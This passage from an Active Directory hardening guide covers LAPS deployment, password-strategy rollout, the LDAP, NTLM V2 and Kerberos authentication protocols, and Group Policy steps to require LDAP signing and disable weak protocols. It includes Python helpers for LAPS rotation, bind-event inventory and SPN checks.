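_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
_TICKS_PER_SECOND = 10_000_000  # FILETIME counts 100 ns intervals
# Character classes a generated password must draw from (assumed policy).
_CLASSES = (string.ascii_lowercase, string.ascii_uppercase, string.digits, "!#$%&*+-=?@")


def filetime_to_datetime(value: str) -> datetime:
    """Convert the decimal FILETIME string stored in AD to an aware UTC datetime."""
    return _FILETIME_EPOCH + timedelta(microseconds=int(value) // 10)


def datetime_to_filetime(when: datetime) -> str:
    """Convert an aware datetime back to the decimal FILETIME string AD expects."""
    delta = when - _FILETIME_EPOCH
    seconds = delta.days * 86400 + delta.seconds
    return str(seconds * _TICKS_PER_SECOND + delta.microseconds * 10)


def password_expired(expiration_attr: Optional[str], now: datetime) -> bool:
    """Step 1: an absent expiration time is treated as expired (first deployment)."""
    if not expiration_attr:
        return True
    return filetime_to_datetime(expiration_attr) <= now


def generate_password(length: int = 14) -> str:
    """Step 2: random password containing at least one character of each class."""
    if length < len(_CLASSES):
        raise ValueError("length too short to cover every character class")
    chars = [secrets.choice(cls) for cls in _CLASSES]
    alphabet = "".join(_CLASSES)
    chars += [secrets.choice(alphabet) for _ in range(length - len(chars))]
    secrets.SystemRandom().shuffle(chars)
    return "".join(chars)


def password_covers_classes(password: str) -> bool:
    """Check that every character class is present (validates generation)."""
    return all(any(c in cls for c in password) for cls in _CLASSES)


def apply_policy(computer: Dict[str, str], now: datetime, max_age_days: int = 30) -> bool:
    """Steps 1 to 3 for one computer account.

    Returns True when a new password was generated and both attributes were
    written back, False when the current password is still valid. max_age_days
    mirrors the 'Password Age (Days)' value of the LAPS GPO (30 is its default).
    """
    if not password_expired(computer.get("ms-Mcs-AdmPwdExpirationTime"), now):
        return False
    # Step 2: new password for the local administrator account.
    computer["ms-Mcs-AdmPwd"] = generate_password()
    # Step 3: write the password and its new expiration date back to AD.
    computer["ms-Mcs-AdmPwdExpirationTime"] = datetime_to_filetime(
        now + timedelta(days=max_age_days))
    return True


if __name__ == "__main__":
    # Constructed computer account: its password expired on 1970-01-01.
    account = {"ms-Mcs-AdmPwd": "OldP@ssw0rd!",
               "ms-Mcs-AdmPwdExpirationTime": "116444736000000000"}
    rotated = apply_policy(account, datetime.now(timezone.utc))
    print("rotated:", rotated, "new expiration:",
          filetime_to_datetime(account["ms-Mcs-AdmPwdExpirationTime"]))
```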


The LAPS tool comes with a PowerShell administration module and a graphical interface to search for passwords.

It is necessary to connect on port 636 (LDAPS) or to use the native LAPS tools (which provide protection) when accessing a password stored in the
ms-Mcs-AdmPwd attribute of a computer account. Otherwise, the password travels unencrypted over the network like any other data.

http://www.cert.ssi.gouv.fr/site/CERTFR-2016-ACT-008/index.html
http://blogs.msdn.com/b/laps/archive/2015/06/01/laps-and-password-storage-in-clear-text-in-ad.aspx

Microsoft Premier customers can access a special version of Microsoft LAPS that supports password history management for the local
administrator account (in a new attribute) and can store the password encrypted in Active Directory.

The value of deploying Microsoft's solution to protect against privilege elevation attacks is presented in the following video:

https://experiences.microsoft.fr/Video/avec-laps-metsys-premunit-un-si-dattaques-par-elevation-deprivileges/fd1a804d-c21d-4bbe-97d7-1697364fe5b5#f7GY1f7uVyK

Feedback on deploying Microsoft LAPS:

On workstations / domain member servers, you only need to register the DLL %ProgramFiles%\LAPS\CSE\AdmPwd.dll to add the LAPS Group
Policy Client Side Extension.

This can be done in 2 ways:

msiexec /i \\server\share\LAPS.x64.msi /quiet
regsvr32.exe AdmPwd.dll

The LAPS PowerShell administration module and the graphical password search interface both require the deployment of the .NET Framework
4.0. It is recommended to deploy PowerShell V3; use the following procedure only if you have PowerShell V2 (the default on Windows 2008 R2):

With PowerShell V2, a change is required if the module does not work. It works by default with PowerShell V3.

You must create the file C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe.config to allow the assembly compiled for the .NET
Framework 4.0 to load. Sample file content below:

<?xml version="1.0"?>
<configuration>
  <startup useLegacyV2RuntimeActivationPolicy="true">
    <supportedRuntime version="v4.0.30319"/>
    <supportedRuntime version="v2.0.50727"/>
  </startup>
</configuration>

LAPS requires updating the Active Directory schema. This action is done via the LAPS PowerShell module (screenshot below).

It is necessary to delegate to the computer accounts the right to read and write the ms-Mcs-AdmPwdExpirationTime attribute and the right to
write only the ms-Mcs-AdmPwd attribute.

This can be done for a specific OU with the command:

Set-AdmPwdComputerSelfPermission -OrgUnit <name of the OU to delegate permissions on>

It is then necessary to delegate to the administrators who are not members of highly privileged groups such as Domain Admins the ability to
read the ms-Mcs-AdmPwd attribute. This is done with the following PowerShell command:

Set-AdmPwdReadPasswordPermission -OrgUnit <name of the OU to delegate permissions on> -AllowedPrincipals <users or groups>

The last step is to configure the GPO that is used to set up the LAPS tool.


3.15 DEFINING A TARGET PASSWORD STRATEGY

Once you have evaluated your needs and have an idea of the technical solutions to implement, you need to arrange meetings with company
management, the teams responsible for resetting passwords and the employee representatives. Nothing can be done without them or
against them.

For a password management security project to succeed, have company management validate your approach and, if necessary, update the IT
charter to describe the potential penalties for non-compliance with the password security rules (writing it on a POST-IT is forbidden...). A user
who writes their password behind their keyboard should be made highly aware of the security risks. Union representatives must approve the
technical solutions implemented, the IT charter and the measures taken against employees who violate the new security rules.

The teams responsible for resetting passwords must be involved in the implementation of solutions such as PWM, which allows a user to reset
their own password (without the intervention of the Helpdesk team) by answering their secret questions. This tool will indeed also allow the
Helpdesk teams to identify the applicant before resetting their password.

If some VIP users refuse to change their passwords, you may consider lowering the security settings of the Default Domain Policy (minimum
standard) and implementing PSOs for the other users (standard norm).

The security level of a system corresponds to the lowest security level of any of its components. It is preferable to implement a secure password
strategy for 90 percent of users and a weak one for the 10 percent who would otherwise block any password strategy. When 90 percent of users
have switched, you demonstrate that the solution is viable and you can convince the 10 percent of recalcitrant users to apply the security
standards.

Avoid implementing an overly complex password strategy with third-party tools such as Hitachi ID Password Manager. Users must succeed in
changing their password on the first try by applying basic instructions. Prohibiting all common dictionary words can be very counterproductive.

Avoid configuring accounts with significant administrative privileges as scheduled tasks or services on insecure machines that the Active
Directory team does not control.


4 STRENGTHENING THE SECURITY OF AUTHENTICATION PROTOCOLS
4.1 THE LDAP PROTOCOL

Active Directory is an LDAP directory. A user can use a tool like LDP.EXE to connect to a domain controller and run LDAP commands such as
Bind (user authentication), Search (finding objects) or Add (adding a new object). Active Directory supports two methods for performing an
LDAP Bind command:

• LDAP Simple Bind
• LDAP SASL Bind

4.1.1 LDAP SIMPLE BIND

This method consists of sending the user login and password in clear text over the network to authenticate. Active Directory supports several
types of login in an LDAP Simple Bind request:
• The value of the distinguishedName attribute (example: CN=Guillaume Mathieu,OU=IT,DC=msreport,DC=FR)
• The value of the UserPrincipalName attribute (example: guillaume.mathieu@msreport.fr)
• The value of the SamAccountName attribute, with the @ character and the DNS domain name (example: gmathieu@msreport.fr)
• The value of the SamAccountName attribute, with the @ character and the UPN suffix (example: gmathieu@msreport.fr)
• The NetBIOS name of the domain with the \ character and the value of SamAccountName (example: Msreport\gmathieu)
• The canonical name of the object (example: msreport.fr/IT/Guillaume Mathieu)
• The value of the ObjectGUID attribute (example: 43a1fa2b-9a8e-4d46-92e5-aca403197f3f)
• The value of the displayName attribute (example: Guillaume MATHIEU)
• One of the values of the ServicePrincipalName attribute
• The value of the ObjectSID attribute (example: S-1-5-21-2479351881-651737401-1049745595-1105)
• One of the values of the SIDHistory attribute.

Active Directory supports SSL / TLS (LDAPS connection) to prevent an attacker from obtaining the user's password during an LDAP Simple Bind.

4.1.2 LDAP SASL BIND

SASL stands for Simple Authentication and Security Layer. This method allows protocols like Kerberos, NTLM V2, NTLM, LM or DIGEST to be
used to authenticate to an LDAP server. It avoids sending the login / password in the clear over the network. SASL allows the use of the 4
authentication mechanisms presented in the table below.

Protocol: Additional authentication information
GSS-SPNEGO: Used to authenticate with the Kerberos, LM, NTLM V1 and NTLM V2 protocols.
GSSAPI: Used to authenticate with the Kerberos, LM, NTLM V1 and NTLM V2 protocols.
EXTERNAL: Used to authenticate with an external method such as a certificate.
DIGEST-MD5: Used to authenticate with Digest-MD5.

I invite you to read these articles before continuing:


http://fr.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol
http://blogs.technet.com/b/askds/archive/2009/09/21/understanding-ldap-security-processing.aspx



4.2 PRESENTATION OF THE NTLM V2 PROTOCOL

The NTLM V2 authentication protocol is still used and active in Microsoft Windows environments, although the Kerberos authentication
protocol is more secure, because:
1. Only NTLM allows users to authenticate to a resource when it is accessed via its IP address.
2. If an external trust relationship was established between two domains (in two separate forests) and your domain controllers are running
Windows 2003, only the NTLM protocol allows a user of domain A to authenticate to a resource of domain B (and vice versa). With Windows
2008 R2 domain controllers (and higher) it is now possible to use Kerberos over an external trust relationship. For more information, see

http://jorgequestforknowledge.wordpress.com/2011/09/14/kerberos-authentication-over-an-externaltrust-is-it-possible-part-6/

3. Only the NTLM protocol is supported when authenticating with an account of the local SAM database on a Windows machine.

4. Only the NTLM protocol is supported by some systems (like Windows NT4) or applications.

We will see how a client C can access a server S by authenticating with the NTLM V2 protocol. The client C and the server S are both members
of the domain msreport.be.

There are 3 players in NTLM authentication:

• Client C: the user who wants to access a service (such as file sharing) of the server S.
• The server S: the machine that hosts the service (such as file sharing).
• The domain controller: it allows the client C and the server S to be authenticated.

The NTLM V2 authentication protocol is a challenge / response mechanism that allows clients to authenticate (prove their identity) without
sending their password in clear text over the network. The NTLM V2 protocol is an evolution of LM and NTLM. We will see later in this document
that the LM and NTLM (NTLM V1) protocols must be disabled because they are much less secure than NTLM V2.

In our example, the client has not yet authenticated to the Active Directory domain controller. It is assumed that LM hash storage is disabled.
NTLM V2 authentication then requires 7 steps.

1. Client C logs on by entering their login and password. The DLL msgina.dll transfers the user login and password to the process Lsass.exe
(NETLOGON service).
2. The Windows client C generates a hash of the user's password (NTHASH). It clears the clear-text password entered by the user from memory.
The process Lsass.exe keeps the user's NTHASH in memory after authentication. The client sends the user login in plaintext to the server S.

3. The server S generates a random number of 16 bytes (called nonce or challenge) and sends it to the client.

4. The client encrypts the challenge with its password in NTHASH format and sends the result (response) to the server S.

5. The server S sends the user login, the challenge and the response (the challenge encrypted with the user's NTHASH) to the domain controller.

6. The domain controller fetches the user's NTHASH (it is stored in the UnicodePwd attribute of the Active Directory user account) and encrypts
the challenge with it. The domain controller then compares the result with the response sent by the server S. If it matches, the domain
controller tells the server S that the client C is authenticated.

7. The server S grants access to the client C.

For more information about NTLM V2:

http://davenport.sourceforge.net/ntlm.html
https://www.sstic.org/media/SSTIC2007/SSTIC-actes/Secrets_d_authentification_sous_Windows/SSTIC2007-ArticleSecrets_d_authentification_sous_Windows-bordes.pdf
http://blogs.msdn.com/b/chiranth/archive/2013/09/21/ntlm-want-to-know-how-it-works.aspx


4.3 OVERVIEW OF THE KERBEROS V5 PROTOCOL

In this section, we will see how a client C can access a server S by authenticating with the Kerberos protocol. The client C and the server S are
both members of the domain msreport.be.

The Kerberos protocol is the most secure protocol to authenticate a user (or computer) that wishes to access a resource (file sharing) on a
member server of an Active Directory domain. In a typical scenario, there are 3 players:

• The client C (the user in this case) who wants to authenticate to a server S.
• The server S (the file server, or the computer account of the server S) which must ensure the authenticity of C.
• The trusted third party, the KDC (Active Directory domain controller).

Each domain controller hosts the Kerberos Key Distribution Center (KDC) service.
To access the file server S, the client C must use a NetBIOS or DNS name. This name must be added to the computer account of the file server S
in the ServicePrincipalName attribute, in the following format:
<service-type>/<NetBIOS or DNS name>:<port number>/<service name>
Example: Host/SRV2012C

If you specify an IP address to connect to a share, you cannot authenticate with Kerberos, as the ServicePrincipalName attribute ignores
entries with IP addresses. You must use the NTLM V2 authentication protocol for this scenario.

Kerberos authentication consists of 6 network exchanges to allow the client C to be authenticated by the server S. In the example below it is
assumed that the client has never yet authenticated to a domain controller. It must therefore request a TGT from its domain controller and a
session key S_CK (between the client C and the domain controller).

The KRB_AS_REQ and KRB_AS_REP messages


Client C logs on by entering their login and password. The DLL msgina.dll transfers the user login and password to the process Lsass.exe
(NETLOGON service).

The client generates a hash of the password (NTHASH) and erases the plain-text password it entered from memory. The process Lsass.exe
keeps the user's NTHASH in memory after authentication.

The client will compute its secret key K_C, which is derived from its password (in NTHASH format) according to the encryption function used
by Kerberos (des-cbc-md5, aes128-cts-hmac-sha1, aes256-cts-hmac-sha1, rc4-hmac-md5).

The KRB_AS_REQ request and the KRB_AS_REP reply allow the client to request a TGT from the domain controller and a session key between
the client and the KDC (S_CK). The process Lsass.exe (NETLOGON service) retains the TGT and the key in memory. The key K_C allows the
client to prove its identity to the domain controller (pre-authentication) and to encrypt the confidential data of the KRB_AS_REQ and
KRB_AS_REP exchanges. The domain controller also has the client's key K_C because the latter is stored in different forms (for the different
algorithms used by Kerberos) in the supplementalCredentials attribute of the user account of client C (see
http://msdn.microsoft.com/en-us/library/cc245674.aspx).

The KRB_TGS_REQ and KRB_TGS_REP messages:

These two requests allow the client to retrieve the service ticket (T_S) to connect to the file server S and to negotiate a session key between the
client C and the server S (S_CS).
The client authenticates itself to the domain controller by encrypting an authenticator (containing the client name, date / time and sequence
number) with the key S_CK and transmitting its TGT.

The KRB_AP_REQ and KRB_AP_REP messages:

Client C authenticates to the server S by transmitting the service ticket T_S and an authenticator encrypted with the key S_CS.

[Diagram: the 6 exchanges between the client C, the server S and the domain controller.]

The exchanges are secure because the client C, the server S and the DC have secret keys. The domain controller knows the keys K_S and K_C
because the keys are stored in Active Directory in the supplementalCredentials attribute of the user and computer accounts of the domain. It
can therefore decrypt the messages of the client C and the server S.

• The secret key of the client C (K_C) is derived from the password of the user account according to the Kerberos encryption algorithm used
(des-cbc-md5, aes128-cts-hmac-sha1, aes256-cts-hmac-sha1, rc4-hmac-md5).

• The secret key of the server S (K_S) is derived from the computer account password, as the server service (file sharing) runs in the context of
the System account, that is, the computer account of the server S, according to the Kerberos encryption algorithm used (des-cbc-md5,
aes128-cts-hmac-sha1, aes256-cts-hmac-sha1, rc4-hmac-md5).

• The key K_KDC is derived from the password of the KRBTGT user account according to the Kerberos encryption algorithm used (des-cbc-md5,
aes128-cts-hmac-sha1, aes256-cts-hmac-sha1, rc4-hmac-md5). As this password replicates to all domain controllers (like any object), the key
K_KDC is the same on all domain controllers.

The parameter Network Security: Configure encryption types allowed for Kerberos defines the encryption algorithms that Kerberos can use.

Algorithm              Salt  Extra information
des-cbc-md5            Yes   Moderately secure protocol.
aes128-cts-hmac-sha1   Yes   Highly secure encryption protocol (new in Windows 7 / Windows 2008 R2).
aes256-cts-hmac-sha1   Yes   Highly secure encryption protocol (new in Windows 7 / Windows 2008 R2).
rc4-hmac-md5           No    Historic protocol. Poorly secured. To be disabled.

The keys K_C, K_S and K_KDC have a long life because:

By default the password of the computer accounts changes every 30 days. The lifetime of user account passwords is usually several tens of
days (depending on the password strategies). The KRBTGT account does not have the option Password never expires. The pwdLastSet attribute
shows that the password was set on March 10, 2014 (when the domain was created). The fact that the password has expired (90 days in this
configuration) is not a problem because the account is not used to log on. Only the value of the password matters for Kerberos authentication.

The lifetime of the TGT (10 hours) and of the session ticket T_S (10 hours) is configured in the Group Policy Default Domain Policy.

The authenticator includes the time and date. This allows Kerberos to prevent replay attacks, by allowing by default a 5-minute time difference
between the client C, the server S and the domain controller (KDC).

The standard Kerberos authentication protocol provides authentication but does not provide access control. Indeed, the Windows access
control model is based on the SID (Security Identifier). Microsoft has developed the PAC, which is an extension of the Kerberos protocol. The
PAC retrieves from the directory the SID of the user and of the groups they belong to (including SID History) and stores them in the
Authorization Data field of the TGT. Windows then generates from the TGT information an access token that will be used to control the access
of each process started by the user.

If you want to understand the Kerberos protocol in detail, I invite you to read the document by Aurélien BORDES, which is very comprehensive,
well done and served as the basis for writing this chapter on Kerberos.

http://www.ssi.gouv.fr/IMG/pdf/Aurelien_Bordes_-_Secrets_d_authentification_episode_II_Kerberos_contre-attaque.pdf
http://blogs.msdn.com/b/openspecification/archive/2011/05/31/windows-configurations-for-kerberossupported-encryption-type.aspx

4.4 KERBEROS AUTHENTICATION DELEGATION

Kerberos delegation is a feature that allows a server A (which hosts a website, for example) to authenticate under the identity of a user B (who
previously authenticated on server A) to access a resource on a server C.

When Kerberos delegation is enabled, the user sends a special TGT, generated for them but with the Forwarded attribute, to server B (known as
a Forwarded TGT).

Kerberos delegation is allowed:

1. If the computer account of the server hosting the service is configured for delegation. This is not the case by default. Only the computer
account of a domain controller is enabled for delegation for all services hosted on the domain controller.

2. If the user has authorized the delegation. This is the default case. The option Account is sensitive and cannot be delegated blocks
delegation for specific user accounts. It must be enabled for administrative accounts.

4.5 BEST PRACTICES TO IMPROVE THE SECURITY OF THE ACTIVE DIRECTORY DIRECTORY

4.5.1 BLOCK LDAP SIMPLE BIND CONNECTIONS WITHOUT SSL / TLS

An LDAP Simple Bind consists of sending the user login and password in the clear over the network. This method is not secure because a third
party can intercept the user login and password with a network analyzer such as Wireshark (https://www.wireshark.org). The screenshot below
shows how a potential attacker sees an LDAP Simple Bind connection on the network.

It is recommended to generate a certificate based on the Domain Controller template on all domain controllers. It will then be possible to
perform an LDAP Simple Bind secured with an SSL / TLS connection.

4.5.2 ENABLE LDAP TRAFFIC SIGNING

At many of my clients, the following warning message appears in the Event Viewer:

Log Name: Directory Service
Source: Microsoft-Windows-ActiveDirectory_DomainService
Date: 12/11/2014 8:42:38
Event ID: 2886
Task Category: LDAP Interface
Level: Warning
Keywords: Classic
User: Anonymous Logon
Computer: TPODC1.tpo.net
Description:
The security of this directory server can be significantly enhanced by configuring the server to reject SASL (Negotiate, Kerberos, NTLM,
or Digest) LDAP binds that do not request signing (integrity verification) and LDAP simple binds that are performed on a cleartext (non-
SSL/TLS-encrypted) connection. Even if no clients are using such binds, configuring the server to reject them will improve the security
of this server.

Some clients may currently be relying on unsigned SASL binds or LDAP simple binds over a non-SSL/TLS connection, and will stop
working if this configuration change is made. To assist in identifying these clients, if such binds occur this directory server will log a
summary event once every 24 hours indicating how many such binds occurred. You are encouraged to configure those clients to not
use such binds. Once no such events are observed for an extended period, it is recommended that you configure the server to reject
such binds.

You can enable additional logging to log an event each time a client makes such a bind, including information on which client made the
bind. To do so, please raise the setting for the "LDAP Interface Events" event logging category to level 2 or higher.

The use of a TLS / SSL connection (which requires a certificate) also signs the LDAP traffic. This is why LDAP signing is not necessary for an
LDAP Simple Bind with SSL / TLS.

The Microsoft article http://support.microsoft.com/kb/935834/en-us explains that it is possible to enable LDAP signing to block LDAP Simple
Bind commands without SSL / TLS and to block LDAP SASL Bind commands without signing.

To enable this change:

1. Edit the Group Policy Default Domain Controller Policy. Go to Computer Configuration \ Windows Settings \ Security Settings \ Local Policies \
Security Options. Set the setting Domain controller: LDAP server signing requirements to Require signing.

2. Edit the Group Policy Default Domain Policy. Go to Computer Configuration \ Windows Settings \ Security Settings \ Local Policies \ Security
Options. Set the setting Network security: LDAP client signing requirements to Require signing.

To verify that the new setting is in production, launch the LDP.EXE utility. Click on Connection | Connect. Enter the domain controller IP. Do not
check the SSL checkbox. The directory returns this information:

supportedSASLMechanisms (4): GSSAPI; GSS-SPNEGO; EXTERNAL; DIGEST-MD5;

Then go to Connection | Bind.
Enter your user name and select the Simple bind check box.

The following error should appear:
Error 0x2028. A more secure authentication method is required for this server.
Indeed, LDAP Simple Bind commands are no longer allowed without SSL / TLS.

Install Active Directory Certificate Services (see attached procedure) on a member server. Create an enterprise root certification authority (a
single-tier certification authority is sufficient for a demonstration).

By default, Windows 2012 R2 domain controllers are configured to obtain a Domain Controller type certificate via autoenrollment. To force the
generation of the certificate, type the command gpupdate /force on the Windows 2012 R2 domain controller. You now have a Domain
Controller type certificate.

Now you can test an LDAP Simple Bind with SSL / TLS. Enter the domain controller DNS name and check the SSL checkbox.

You should get the following result:

res = ldap_simple_bind_s(ld, 'msreport\administrator', <unavailable>); // v.3
Authenticated as: 'MSREPORT\Administrator'.

Then click on View | Tree. Add the LDAP path of the domain (DC=msreport,DC=be in this example). You can now browse the Active Directory.

Enable LDAP signing only after having validated it on a model environment and after identifying all applications that perform LDAP Simple
Bind authentication requests.

To identify the applications that perform LDAP Simple Binds, you have to filter the event log on the ID 2887 as stated in the article
http://support.microsoft.com/kb/935834/.
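To identify those applications from the events described above, here is an added example (not from the original document) that parses the text of Directory Service events 2887 (24-hour summary) and 2889 (one event per client once "LDAP Interface Events" is raised to level 2) into an inventory of clients still doing simple binds without SSL/TLS or unsigned SASL binds; the event text below is constructed, with field labels modeled on the real events, and the IP addresses and account names are invented.

```python
"""
Parse an export of the Directory Service log (events 2887 and 2889) and report
which clients and identities still perform LDAP binds that "Require signing"
would reject. Run it against a real export before enabling the GPO settings.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample export (not a real log); one "Event ID:" header per event.
SAMPLE_EXPORT = """\
Event ID: 2887
Description:
During the previous 24 hour period, some clients attempted to perform LDAP binds
that were either unsigned SASL binds or simple binds on a cleartext connection.
Number of simple binds performed without SSL/TLS: 3
Number of Negotiate/Kerberos/NTLM/Digest binds performed without signing: 12
Event ID: 2889
Description:
The following client performed a SASL bind without requesting signing, or a
simple bind over a cleartext LDAP connection.
Client IP address:
10.0.0.25:49812
Identity the client attempted to authenticate as:
MSREPORT\\svc_backup
Binding Type:
0
Event ID: 2889
Description:
The following client performed a SASL bind without requesting signing, or a
simple bind over a cleartext LDAP connection.
Client IP address:
10.0.0.40:51001
Identity the client attempted to authenticate as:
MSREPORT\\app_portal
Binding Type:
1
"""

_EVENT_HEADER = re.compile(r"^Event ID:\s*(\d+)\s*$", re.MULTILINE)


def split_events(export: str) -> List[Tuple[int, str]]:
    """Cut the export into (event id, body) pairs using the 'Event ID:' lines."""
    matches = list(_EVENT_HEADER.finditer(export))
    events = []
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(export)
        events.append((int(m.group(1)), export[m.end():end]))
    return events


def _field(body: str, label: str) -> str:
    """Return the line that follows 'label' in an event body (empty if absent)."""
    m = re.search(re.escape(label) + r"\s*\n\s*(.+)", body)
    return m.group(1).strip() if m else ""


def parse_2887(body: str) -> Dict[str, int]:
    """Extract both counters from the daily summary event."""
    simple = re.search(r"without SSL/TLS:\s*(\d+)", body)
    sasl = re.search(r"without signing:\s*(\d+)", body)
    return {
        "simple_binds_without_tls": int(simple.group(1)) if simple else 0,
        "unsigned_sasl_binds": int(sasl.group(1)) if sasl else 0,
    }


def parse_2889(body: str) -> Dict[str, str]:
    """Extract the client address (source port stripped), identity and raw binding type."""
    address = _field(body, "Client IP address:")
    return {
        "client": address.rsplit(":", 1)[0] if ":" in address else address,
        "identity": _field(body, "Identity the client attempted to authenticate as:"),
        "binding_type": _field(body, "Binding Type:"),
    }


def inventory(export: str) -> Dict[str, object]:
    """Totals from the 2887 events and, per client address, the identities seen in 2889."""
    totals = {"simple_binds_without_tls": 0, "unsigned_sasl_binds": 0}
    clients: Dict[str, set] = defaultdict(set)
    for event_id, body in split_events(export):
        if event_id == 2887:
            for key, value in parse_2887(body).items():
                totals[key] += value
        elif event_id == 2889:
            details = parse_2889(body)
            clients[details["client"]].add(details["identity"])
    return {"totals": totals, "clients": {ip: sorted(ids) for ip, ids in clients.items()}}


if __name__ == "__main__":
    print(inventory(SAMPLE_EXPORT))
```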

4.5.3 DISABLE THE NTLM AUTHENTICATION PROTOCOLS

Active Directory allows users to authenticate with the LM, NTLM V1, NTLM V2 and Kerberos protocols (we disregard the DIGEST protocol, which
requires a special, unsafe configuration and is not activated). If you only have machines running Windows 7 and Windows 2008 R2, you can
disable LM and NTLM. Only the Kerberos and NTLM V2 authentication protocols will be allowed.

It is also possible to prohibit the NTLM V2 protocol, but that requires a very thorough study phase (see later in this document).

The use of the LM, NTLM V1 and NTLM V2 protocols is controlled by the Group Policy setting Network security: LAN Manager authentication
level.
Start the gpmc.msc console and edit the Default Domain Policy. Go to Computer Configuration | Policies | Windows Settings | Security Settings |
Security Options.
Set the setting Network security: LAN Manager authentication level to Send NTLMv2 response only. Refuse LM & NTLM.

Do the same in the Default Domain Controller Policy (to avoid any potential conflict).

With this setting, the LM and NTLM V1 protocols are disabled, which increases the security level of the directory.

Examples of applications requiring the NTLM or LM protocols:
• File servers / NAS that rely on SAMBA must be at least version 3.0, as stated on the website http://www.samba.org/samba/history/.
• You must have Service Pack 4 for Windows NT4 workstations.

A study of the impact of disabling LM & NTLM should be performed before applying this setting to the production environment.

It is possible to go further and also disable the NTLM V2 protocol. This action is strongly discouraged and requires a very thorough analysis
of the impacts at the application level. It can be applied in research environments with very high security requirements.

To disable NTLM V2 (and all variants such as LM and NTLM):

Launch the gpmc.msc console and edit the Default Domain Policy. Go to Computer Configuration | Policies | Windows Settings | Security Settings |
Security Options.
Set the setting Network security: Restrict NTLM: NTLM authentication in this domain to the value Deny all.

In this mode, all NTLM traffic is prohibited except for the machines added to the GPO setting Network security: Restrict NTLM: Add server
exceptions for NTLM authentication in this domain. Logging on with an account of the local SAM database on a Windows machine also always
uses NTLM.

The use of Kerberos authentication requires a ServicePrincipalName to be created to identify all the servers and enterprise applications. It will
be necessary to create an SPN for every DNS alias. In the example below, the server CHBAADMT hosts a SQL Server 2008 R2 instance named
ADMT. To authenticate to SQL Server 2008 R2, the ServicePrincipalName attribute of the CHBAADMT computer account must contain the
following entry:
MSSQLSvc/CHBAADMT.chidf75.net:ADMT

To view the ServicePrincipalName attribute, configure the Active Directory Users and Computers console in Advanced Features display mode.
Then go to the Attribute Editor tab and select ServicePrincipalName. To add or remove an SPN, use the Setspn.exe tool.

To disable NTLM V2, it is necessary to check whether all applications that authenticate with Active Directory user accounts support Kerberos
and whether you have created all the required ServicePrincipalNames.

If the NTLM protocol is disabled, access to an application via its IP address is no longer possible. The error message The network name cannot
be found appears.

To help you in this task, it is possible to activate a GPO setting that will create a log with all applications / machines that use NTLM, at the log
level Applications and Services Log / Microsoft / Windows / NTLM. This setting requires the availability of a Windows 2008 R2 domain
controller.

I invite you to read these articles for more information on how to block LM and NTLM V1 authentication, and NTLM V2.

http://blogs.technet.com/b/askds/archive/2009/10/08/ntlm-blocking-and-you-application-analysis-andauditing-methodologies-in-windows-7.aspx
http://technet.microsoft.com/en-us/library/jj865680(v=ws.10).aspx
http://technet.microsoft.com/en-us/library/jj865671(v=ws.10).aspx

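Checking a computer account's SPN list before NTLM is disabled, as an added example (not from the document) that uses the ServicePrincipalName format given in section 4.3 and the CHBAADMT / ADMT example above: it flags SPNs whose host part is an IP address (unusable with Kerberos, as explained), builds the SPN set a service needs for a host and all of its DNS aliases, and reports the ones missing. The SPN values are constructed and the alias name sql-admt.chidf75.net is assumed.

```python
"""
Parser and checks for the ServicePrincipalName format
<service-type>/<NetBIOS or DNS name>:<port or instance>/<service name>.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence

# service-type / host [ : port-or-instance ] [ / service-name ]
_SPN_RE = re.compile(r"^([^/:]+)/([^/:]+)(?::([^/]+))?(?:/(.+))?$")


@dataclass(frozen=True)
class Spn:
    service_type: str
    host: str
    port_or_instance: Optional[str] = None  # MSSQLSvc puts the instance name here
    service_name: Optional[str] = None

    def key(self) -> str:
        """Canonical form for comparison: service type and host are case-insensitive."""
        spn = f"{self.service_type.lower()}/{self.host.lower()}"
        if self.port_or_instance:
            spn += f":{self.port_or_instance}"
        if self.service_name:
            spn += f"/{self.service_name}"
        return spn


def parse_spn(value: str) -> Spn:
    """Split one SPN string into its four parts; raise on a malformed value."""
    m = _SPN_RE.match(value.strip())
    if not m:
        raise ValueError(f"malformed SPN: {value!r}")
    return Spn(*m.groups())


def host_is_ip(spn: Spn) -> bool:
    """True when the host part is an IP address: such an SPN is useless for Kerberos."""
    try:
        ipaddress.ip_address(spn.host)
        return True
    except ValueError:
        return False


def expected_spns(service_type: str, names: Sequence[str],
                  port_or_instance: Optional[str] = None) -> List[str]:
    """SPNs a service needs so that every name (host and DNS aliases) works with Kerberos."""
    suffix = f":{port_or_instance}" if port_or_instance else ""
    return [f"{service_type}/{name}{suffix}" for name in names]


def missing_spns(registered: Sequence[str], required: Sequence[str]) -> List[str]:
    """Required SPNs absent from the account's ServicePrincipalName attribute."""
    present = {parse_spn(s).key() for s in registered}
    return [s for s in required if parse_spn(s).key() not in present]


def ip_based_spns(registered: Sequence[str]) -> List[str]:
    """Registered SPNs that name an IP address instead of a NetBIOS or DNS name."""
    return [s for s in registered if host_is_ip(parse_spn(s))]


if __name__ == "__main__":
    # Constructed SPN list for the CHBAADMT computer account; sql-admt is an assumed DNS alias.
    registered = ["HOST/CHBAADMT", "HOST/CHBAADMT.chidf75.net",
                  "MSSQLSvc/CHBAADMT.chidf75.net:ADMT"]
    required = expected_spns("MSSQLSvc",
                             ["CHBAADMT", "CHBAADMT.chidf75.net", "sql-admt.chidf75.net"],
                             "ADMT")
    print("missing:", missing_spns(registered, required))
    print("IP-based (unusable with Kerberos):", ip_based_spns(registered + ["HOST/10.1.2.3"]))
```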
4.5.4 KERBEROS ENCRYPTION ALGORITHMS

If you only have machines running Windows 7 / Windows 2008 R2 and later versions, you can allow only the encryption algorithms
AES128_HMAC_SHA1 and AES256_HMAC_SHA1 for Kerberos. The encryption algorithms AES128_HMAC_SHA1 and AES256_HMAC_SHA1 are
indeed more secure than DES_CBC_MD5 or RC4_HMAC_MD5 (the least secure algorithm).

To enable this setting:

Start the gpmc.msc console and edit the Default Domain Policy. Go to Computer Configuration | Policies | Windows Settings | Security Settings |
Security Options. In the parameter Network Security: Configure encryption types allowed for Kerberos, check only the AES128_HMAC_SHA1 and
AES256_HMAC_SHA1 boxes. Do the same in the Default Domain Controller Policy.

This setting affects all user accounts and all computer accounts in the domain. It overrides the settings defined on the user and computer
accounts, as explained in the following Microsoft article:

